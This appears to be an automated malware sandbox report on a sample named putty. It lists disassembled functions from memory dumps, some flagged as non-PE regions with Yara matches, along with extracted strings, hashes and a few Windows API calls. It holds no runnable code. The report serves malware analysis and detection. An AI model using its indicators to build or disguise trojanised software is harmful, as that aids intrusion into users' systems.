Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: InformationTimeZone
String ID: 0000$wwww
API String ID: 565725191-3705946468
Opcode ID: 55751eee4d2fe4408795184596e6fb53879d562c595cd80584f690be28e17adf
Instruction ID: 7b59763e6f5396fc942564336185bb441b8e85bf53e17a1f288c0b3b7fbd7660
Opcode Fuzzy Hash: 55751eee4d2fe4408795184596e6fb53879d562c595cd80584f690be28e17adf
Instruction Fuzzy Hash: 3E81DA65709BC2AFC70ECB3C94517E5FFA1BF66200F08469DD4A987343C7246668CBA2

Function 0289D726 Relevance: 5.2, Strings: 4, Instructions: 232COMMON

Download Yara Rule

Strings

ugqN, xrefs: 0289D87B
%&, xrefs: 0289D9A0
uHF, xrefs: 0289D9AA
Z*Y,, xrefs: 0289D97F

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID: %&$Z*Y,$uHF$ugqN
API String ID: 0-2741559165
Opcode ID: dbc2cf40a8ef09a8a980c34dbe8aeba88c312c751bc7a6e3a7e6212ba74f9497
Instruction ID: ef9b145a1ccdf1dbc294018f1c255566e248b1d376a49eba3c88354900ffb015
Opcode Fuzzy Hash: dbc2cf40a8ef09a8a980c34dbe8aeba88c312c751bc7a6e3a7e6212ba74f9497
Instruction Fuzzy Hash: 1D61D4B991D3C18ED7359F2984907ABBBE29FD3305F18886CD4CD8B242CB7851069B16

Function 0289A8C1 Relevance: 5.2, Strings: 4, Instructions: 159COMMON

Download Yara Rule

Strings

7Y([, xrefs: 0289A970
\], xrefs: 0289AA2A
'U5W, xrefs: 0289A968
LMN, xrefs: 0289A8D9

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID: 'U5W$7Y([$\]$LMN
API String ID: 0-690623037
Opcode ID: f188f4803fbbce4926258c924a20f909f0f8a7105efd5cc6438c8463b7771fb7
Instruction ID: aaad04f26c30b7f5ddf84e54905f1a26f15916508cd955fcf677948a31879605
Opcode Fuzzy Hash: f188f4803fbbce4926258c924a20f909f0f8a7105efd5cc6438c8463b7771fb7
Instruction Fuzzy Hash: D451B6739083618BD729CF18945169FF7F2ABC4704F47C91DD8EAAB640DB74990A8BC2

Function 02888FE1 Relevance: 5.1, Strings: 4, Instructions: 104COMMON

Download Yara Rule

Strings

yxwv, xrefs: 02889045
yxwv, xrefs: 02888F8D
yxwv, xrefs: 02888F18
yxwv, xrefs: 02889081

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID: yxwv$yxwv$yxwv$yxwv
API String ID: 0-3127170981
Opcode ID: 74cd93308cd499c54da37acc7f40267021682914cdb6ec5deb6171a752834c78
Instruction ID: 8ae7f2cc9b690c659ee90e747ba578bc050a6e3ee480c2d412e513d549a34219
Opcode Fuzzy Hash: 74cd93308cd499c54da37acc7f40267021682914cdb6ec5deb6171a752834c78
Instruction Fuzzy Hash: 4131F87DA18A458FC724EF28C841A7AB3E2BBD9301F698A6CC0D7CB254C7309915CB45

Function 00323B60 Relevance: 4.6, APIs: 3, Instructions: 128stringfileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,00000001,0000002A,?,00000000,000000FF), ref: 00323C57
lstrcmpW.KERNEL32(00000000,003ECB4C,?,00000000,000000FF), ref: 00323C9F
lstrcmpW.KERNEL32(00000000,003ECB50,?,00000000,000000FF), ref: 00323CAB

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: lstrcmp$FileFindFirst
String ID:
API String ID: 2423674170-0
Opcode ID: b4c33df9106a6256ec9d1b504c2f865f083e8e69e01e1af380d1206fe928a8c1
Instruction ID: df3fb4e1119f50e35b3c46dc940f4c185b46e4382a047b0f52d4a101cda90011
Opcode Fuzzy Hash: b4c33df9106a6256ec9d1b504c2f865f083e8e69e01e1af380d1206fe928a8c1
Instruction Fuzzy Hash: ED416471D102299FCB12DFA8E885AEEB7B9FF48710F10461AF551B7280E7746A05CB91

Function 0289DA19 Relevance: 4.2, Strings: 3, Instructions: 492COMMON

Download Yara Rule

Strings

@, xrefs: 0289DFFE
vW, xrefs: 0289DDDD
U, xrefs: 0289DE7D

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID: @$U$vW
API String ID: 0-3307612544
Opcode ID: b38134d7a1a69e52e289c4a9dfc476b8b958903d39d55eb54f2b491ee00270aa
Instruction ID: ff1b5adcbc5a2ec206c977f26bac14bd9cb1180ab1af1d818a0af0b92f3c4bd0
Opcode Fuzzy Hash: b38134d7a1a69e52e289c4a9dfc476b8b958903d39d55eb54f2b491ee00270aa
Instruction Fuzzy Hash: 6AD107786183C18EEB258F3884517BBBBD19B93304F5C896DD0CDCB282DB79810AD766

Function 0289DA1E Relevance: 4.2, Strings: 3, Instructions: 474COMMON

Download Yara Rule

Strings

@, xrefs: 0289DFFE
vW, xrefs: 0289DDDD
U, xrefs: 0289DE7D

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID: @$U$vW
API String ID: 0-3307612544
Opcode ID: 819bd7f6fe075729b0edd9d689f3680f12461a5d3e7c528ea4a161f19879750e
Instruction ID: f739343b0572ea6c3a6ed05ca1dca17d72fb8dd4cd6b22c44cde88cd21bf4a2d
Opcode Fuzzy Hash: 819bd7f6fe075729b0edd9d689f3680f12461a5d3e7c528ea4a161f19879750e
Instruction Fuzzy Hash: 79D1E46851C3C08AEB359F3984607BBBBE19F93305F1848ADD1CD97282DB79410ACB26

Function 02887A85 Relevance: 3.9, Strings: 3, Instructions: 107COMMON

Download Yara Rule

Strings

(u:w, xrefs: 02887B9B
MNO, xrefs: 02887B1C
IK, xrefs: 02887B11

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID: (u:w$IK$MNO
API String ID: 0-340998776
Opcode ID: 5659e241a5e1d28b2d5f2c9fcc25d3ba5fffd9fe28d1d7433a1fce1f89150cad
Instruction ID: 5ee0b6e7ccdfc20daef422d15ab37ad53f5214b54f6eb597eab0222b2330ae58
Opcode Fuzzy Hash: 5659e241a5e1d28b2d5f2c9fcc25d3ba5fffd9fe28d1d7433a1fce1f89150cad
Instruction Fuzzy Hash: F131F4B85053518BC734AF18C892BABB7B5FF82364F154A1CE8D9CB381E7389540C796

Function 0287DB9B Relevance: 3.8, Strings: 3, Instructions: 75COMMON

Download Yara Rule

Strings

PQ, xrefs: 0287DC06
_^, xrefs: 0287DBFE
e, xrefs: 0287DBFA

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID: PQ$_^$e
API String ID: 0-508925340
Opcode ID: 19e7b526ab4115512e535fcf38874c80d8a44619a489d0a691082f1ef1a9c8c8
Instruction ID: 6781ae4c40d1dc5d0406e5468cf2e691e4863c233dddc9adf21aeb096db20c55
Opcode Fuzzy Hash: 19e7b526ab4115512e535fcf38874c80d8a44619a489d0a691082f1ef1a9c8c8
Instruction Fuzzy Hash: B4213576A483559FC3288F20A9D272FBAE1EB86300F05483DEACA97240D6749C049B4A

Function 0288BED9 Relevance: 3.8, Strings: 3, Instructions: 30COMMON

Download Yara Rule

Strings

$'91, xrefs: 0288BF47, 0288BF4E
5380, xrefs: 0288BEEF
L@, xrefs: 0288BF05

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID: $'91$5380$L@
API String ID: 0-323942086
Opcode ID: eec7b1fa22c07f34cb64c446fb8f922c2c4adaf4be085148ab83282144a9472c
Instruction ID: 973187fb5dcc5dd2559567e08cc1868dea404ec5270d195916690b0d6b34cd55
Opcode Fuzzy Hash: eec7b1fa22c07f34cb64c446fb8f922c2c4adaf4be085148ab83282144a9472c
Instruction Fuzzy Hash: F7F06DA960E3C08AE3319F6494486AFFBE5ABD2300F19956CD0DC9B281CB3444058B07

Function 003421D0 Relevance: 3.1, APIs: 2, Instructions: 62COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0034220B
GetVersionExW.KERNEL32(?), ref: 00342224

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Version_memset
String ID:
API String ID: 963298953-0
Opcode ID: 7fdbe9a2c306e3cd0f2bd9f7d003c8c58777b52fabe2c003af844da0bd16fac4
Instruction ID: 2651b7f0588fc28e325b60a91569a4453e58742fc7a480615e4903371c91d6f7
Opcode Fuzzy Hash: 7fdbe9a2c306e3cd0f2bd9f7d003c8c58777b52fabe2c003af844da0bd16fac4
Instruction Fuzzy Hash: 86210471944248ABDB12CF54ED427EAB7E4E709704F40417AEB0697761DB756A08CB05

Function 0289E08A Relevance: 2.9, Strings: 2, Instructions: 411COMMON

Download Yara Rule

Strings

[)Qo, xrefs: 0289E4AC
^SOF, xrefs: 0289E349

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID: [)Qo$^SOF
API String ID: 0-352336679
Opcode ID: a0e5de10a08ab3646dfef7e50ed6c80251fab8a2abf59ce74c29495c9b1a2efd
Instruction ID: 91904cc3bce73419b76445f39fa63c9f6e8f87976bd6355022b8121e177a820d
Opcode Fuzzy Hash: a0e5de10a08ab3646dfef7e50ed6c80251fab8a2abf59ce74c29495c9b1a2efd
Instruction Fuzzy Hash: 30B1A37960C3818ADB25CF3984507ABBFE1ABD7205F18896ED4CD87382DB758506CB52

Function 0289E328 Relevance: 2.9, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

[)Qo, xrefs: 0289E4AC
^SOF, xrefs: 0289E349

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID: [)Qo$^SOF
API String ID: 0-352336679
Opcode ID: cc233addd528627a581f3f3404d03f1aad6074b283dbd75d4d40b7793702391b
Instruction ID: 895001e665466f564adf1d472f86dcc292f0d958d357f0f993e81bbd900aa00e
Opcode Fuzzy Hash: cc233addd528627a581f3f3404d03f1aad6074b283dbd75d4d40b7793702391b
Instruction Fuzzy Hash: 9D91927960C3818EDB25CF3984507ABBFE1ABD7204F18896ED4CD97382DB798506CB52

Function 0288E48B Relevance: 2.8, Strings: 2, Instructions: 269COMMON

Download Yara Rule

Strings

QOS4, xrefs: 0288E679
?, xrefs: 0288E5F9

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID: ?$QOS4
API String ID: 0-3371877639
Opcode ID: ca675240f2d659f1ac5f3fc3a05bc2ef8092032697b2e97ab1e6e80c898bfb04
Instruction ID: cce1575454812eb39f90a5072526f1d93f78549c1d4fa81b8c1018c954ae39a3
Opcode Fuzzy Hash: ca675240f2d659f1ac5f3fc3a05bc2ef8092032697b2e97ab1e6e80c898bfb04
Instruction Fuzzy Hash: 8C71753D8083D28EE305CF248490776BFE29F97355F1C499CF4CAAB252D6759505CB62

Function 028880AB Relevance: 2.7, Strings: 2, Instructions: 209COMMON

Download Yara Rule

Strings

gfff, xrefs: 0288820C
*7, xrefs: 02888165

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID: *7$gfff
API String ID: 0-578429328
Opcode ID: b5c763bc9fc1150556485a232515de6e29c302292c64dea33240c686742b70f5
Instruction ID: 7a3ea1c1ebad9e65a80f528a361f3aaa55fb14302c9028bd9d2c86b16916f18d
Opcode Fuzzy Hash: b5c763bc9fc1150556485a232515de6e29c302292c64dea33240c686742b70f5
Instruction Fuzzy Hash: A2615ABE6186094BD728DF28CC517BBB7E2ABC5314F49872DD48ACB395DB349501CB82

Function 0288BAB1 Relevance: 2.7, Strings: 2, Instructions: 157COMMON

Download Yara Rule

Strings

;, xrefs: 0288BABC
4, xrefs: 0288BBAE

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID: 4$;
API String ID: 0-1289326363
Opcode ID: db513821c28f73bc5598eedb45dce5a18cecf9e20984b8859336d487e5aa0d93
Instruction ID: 327111028a9e3e9e39ceae111893ecc17c9b89766f50be0dcf1b5a9affe5bcfd
Opcode Fuzzy Hash: db513821c28f73bc5598eedb45dce5a18cecf9e20984b8859336d487e5aa0d93
Instruction Fuzzy Hash: C24174785093518BD3218F24C8913F6B7E2EFEA328F19867CC8C88B395D77A5402C382

Function 0288A159 Relevance: 2.6, Strings: 2, Instructions: 91COMMON

Download Yara Rule

Strings

yxwv, xrefs: 0288A218
DBCD, xrefs: 0288A175

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID: DBCD$yxwv
API String ID: 0-1315553449
Opcode ID: e809d8f248b93fc02be5c56a0ed195994598850b222a701c4d2cd45b4beac7c2
Instruction ID: e2f1e40857c6f7adb73488c17d5fe6e7b6645c7d1b818b971c47a02e867d34eb
Opcode Fuzzy Hash: e809d8f248b93fc02be5c56a0ed195994598850b222a701c4d2cd45b4beac7c2
Instruction Fuzzy Hash: AF2179B9A096504FD334DF18CC807A6B3E2BBC5700F28866CC9CA9B299D7315D01C786

Function 0288F585 Relevance: 1.7, Strings: 1, Instructions: 407COMMON

Download Yara Rule

Strings

BC, xrefs: 0288F89F

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID: BC
API String ID: 0-1816342354
Opcode ID: 3f69f4f027db89c3e9159322d90b0ee88116e25869821b94ca9d1d3b4f8d693a
Instruction ID: b46ae35cd8fa670aff4437ad7193debd87917546070b1239025bafc72318721a
Opcode Fuzzy Hash: 3f69f4f027db89c3e9159322d90b0ee88116e25869821b94ca9d1d3b4f8d693a
Instruction Fuzzy Hash: 6EB11F795083418BC324EF28C8916ABB3F1EF95314F588A1CE9D98B390E734D905CB86

Function 0289C555 Relevance: 1.6, Strings: 1, Instructions: 380COMMON

Download Yara Rule

Strings

", xrefs: 0289C82D

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 7dafa801ce2da702a649eb1c7dc10b4b60eacfa8746d2e7f045bb66253cd391d
Instruction ID: 0b2c31ba939c5ee17a3f8e704eddc2960850342fee29f6343db28071d9489def
Opcode Fuzzy Hash: 7dafa801ce2da702a649eb1c7dc10b4b60eacfa8746d2e7f045bb66253cd391d
Instruction Fuzzy Hash: 5BC118BDA083056FDF14CF58C44076AB7E6AB89354F1C892EE89DCB281E776D944C782

Function 0289AE29 Relevance: 1.5, Strings: 1, Instructions: 257COMMON

Download Yara Rule

Strings

lm, xrefs: 0289AFD7

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID: lm
API String ID: 0-3146918833
Opcode ID: 7584f4321d5dfab90de8530e88cc1ee955edc65968efcc910bfb550c4d3c9faa
Instruction ID: 4934c19376520f56d1affe314cfc48684389e0047d39dacf90fb386d77316e57
Opcode Fuzzy Hash: 7584f4321d5dfab90de8530e88cc1ee955edc65968efcc910bfb550c4d3c9faa
Instruction Fuzzy Hash: 327114BA9083148BD724DF18C89276BB7F2FF85714F08892CE8C98B791E3788904C746

Function 028AC325 Relevance: 1.5, Strings: 1, Instructions: 240COMMON

Download Yara Rule

Strings

yxwv, xrefs: 028AC4AA

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID: yxwv
API String ID: 0-3028890330
Opcode ID: 65ad58439a5d38673a0c9ad8a10b3b675accf11ef2ba88c4ccbfdbd6c1a01e47
Instruction ID: ef9d4a1e70322e71766a30c12caa5b8e2e62d14959bbe9f60be7893883faaca7
Opcode Fuzzy Hash: 65ad58439a5d38673a0c9ad8a10b3b675accf11ef2ba88c4ccbfdbd6c1a01e47
Instruction Fuzzy Hash: 3B61F83D6152004FEB18AF28C8B4A7BB7E1FB85324F59952DD496C72A1DF35D840CB85

Function 0289D345 Relevance: 1.4, Strings: 1, Instructions: 158COMMON

Download Yara Rule

Strings

FYZ@, xrefs: 0289D3CE

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID: FYZ@
API String ID: 0-3403561356
Opcode ID: 59a6299d236f6bfd2615a1ca5df3470302e7761478688a56e1361b2bbbee4c1d
Instruction ID: 17bd14af433976363d5935a3257bb289dde5b7504250ed870382dce661c86457
Opcode Fuzzy Hash: 59a6299d236f6bfd2615a1ca5df3470302e7761478688a56e1361b2bbbee4c1d
Instruction Fuzzy Hash: AD41D8A410D3C18BDB299F3884507BABBE19FD3219F1C99ADD2C9A7282D7794047C71A

Function 0289E762 Relevance: 1.4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

Strings

yxwv, xrefs: 0289E815

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID: yxwv
API String ID: 0-3028890330
Opcode ID: 878528e996ee0fbcebadac87db4a41c03196777fe388d1a13d923fb436bc05d5
Instruction ID: 3296409402126007fd20f33e164730463733ad98bd107d26886758e068610a40
Opcode Fuzzy Hash: 878528e996ee0fbcebadac87db4a41c03196777fe388d1a13d923fb436bc05d5
Instruction Fuzzy Hash: CD41F3796193808BEB28CB35C8617BA7BD39BC7305F2C847DD0CECB696DA7984458702

Function 0289D2FA Relevance: 1.4, Strings: 1, Instructions: 154COMMON

Download Yara Rule

Strings

FYZ@, xrefs: 0289D3CE

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID: FYZ@
API String ID: 0-3403561356
Opcode ID: f0846d868b39eebfa08e24e07b75983eb67a47f4a6c0bcd35050ebdb0079d077
Instruction ID: 6dd816b845376b5eb8e2634bf3926937bcd0762a1bee20abf2dee1675f897029
Opcode Fuzzy Hash: f0846d868b39eebfa08e24e07b75983eb67a47f4a6c0bcd35050ebdb0079d077
Instruction Fuzzy Hash: F341FE7410C3D18FDB359F2584607BBBBE19F93209F1C999DC6C9A7242D7754046C71A

Function 028891D2 Relevance: 1.4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

Strings

yxwv, xrefs: 02889233

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID: yxwv
API String ID: 0-3028890330
Opcode ID: 86427c7149883d1339bfdd71a54c117b0752490be21d9b1acdb846a701f6984e
Instruction ID: 306d06353da8eb727305f07cf1908a005794aa23aba74d48b7f3104045dde003
Opcode Fuzzy Hash: 86427c7149883d1339bfdd71a54c117b0752490be21d9b1acdb846a701f6984e
Instruction Fuzzy Hash: 0231397D618150EBD728EF18C840F3AB3A2BBC6345F19861CC48B6B614D7319D10CB96

Function 028954D4 Relevance: 1.4, Strings: 1, Instructions: 122COMMON

Download Yara Rule

Strings

yxwv, xrefs: 02895532

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID: yxwv
API String ID: 0-3028890330
Opcode ID: 1d36a0d26ae0494d9fab4f6aa9aa86e46875f602e5384e54bee6936d4050b7dd
Instruction ID: fa01fb70d79c0809dab975c1cf417f2bf29c2543ab409c6bfc7d6af5aeb0fc5a
Opcode Fuzzy Hash: 1d36a0d26ae0494d9fab4f6aa9aa86e46875f602e5384e54bee6936d4050b7dd
Instruction Fuzzy Hash: 5731267CA183119BDB19CB29CC40B37B7E2FBD6311F58852DE485D3295DB75AC408B82

Function 028B01E5 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

@, xrefs: 028B024D

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: a9df44c3b0767a7413455b448aea9c4261774a98ba34c4e049124a3dfe6b48c1
Instruction ID: e70bb31a3f3208eeaa629ec29803194bc1732bb305b6c8984a018a5218394c52
Opcode Fuzzy Hash: a9df44c3b0767a7413455b448aea9c4261774a98ba34c4e049124a3dfe6b48c1
Instruction Fuzzy Hash: 0421F2796083048BD325DF58C8816AFBBF5EFC6318F14893CE69987390D3319848CB56

Function 0289D2CE Relevance: 1.4, Strings: 1, Instructions: 100COMMON

Download Yara Rule

Strings

FYZ@, xrefs: 0289D3CE

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID: FYZ@
API String ID: 0-3403561356
Opcode ID: 9fb1272a02a0f180f71c0f00397b88d399a31dd880da7cd264604db06057fb2d
Instruction ID: 6c3e3e0d8f03e708ce142bde6f00fdddca91b238c7d8521c55d9aca1928d1624
Opcode Fuzzy Hash: 9fb1272a02a0f180f71c0f00397b88d399a31dd880da7cd264604db06057fb2d
Instruction Fuzzy Hash: 8D31B7A400C3D18ADB359F2884507BBBBE19F93219F18999CC2C9AB182C779404AC71A

Function 028973FF Relevance: 1.3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

yxwv, xrefs: 0289742D

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID: yxwv
API String ID: 0-3028890330
Opcode ID: 527f8344005c22119ec240b71baac9382c998e457c0999c99f879ea9f8a367f5
Instruction ID: a2194e5597cfaca4e77581e5e7d3d703053b764a69df8bd2bb8622f1f09f2b07
Opcode Fuzzy Hash: 527f8344005c22119ec240b71baac9382c998e457c0999c99f879ea9f8a367f5
Instruction Fuzzy Hash: D521907EE250189BDF0CDFA0D850ABEF732FB86311F685028D402A7255DB31AD01CA88

Function 028A9989 Relevance: 1.3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

Strings

yxwv, xrefs: 028A99A8

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID: yxwv
API String ID: 0-3028890330
Opcode ID: b7c9bbb20aac16b8a3d037ecc0c7de69618d0bf6240fd6a65e9afa8b6793de02
Instruction ID: 35044ce282ee6edb9a7e2c7b5455c7c3b842b2bbb0ce367bbcdc7fce3a42ff65
Opcode Fuzzy Hash: b7c9bbb20aac16b8a3d037ecc0c7de69618d0bf6240fd6a65e9afa8b6793de02
Instruction Fuzzy Hash: BE11327D2183049BF710DF54CD80A3AB3F2ABD6340F19A069E6898B265DB70A851D756

Function 02886B87 Relevance: .6, Instructions: 636COMMON

Download Yara Rule

Memory Dump Source

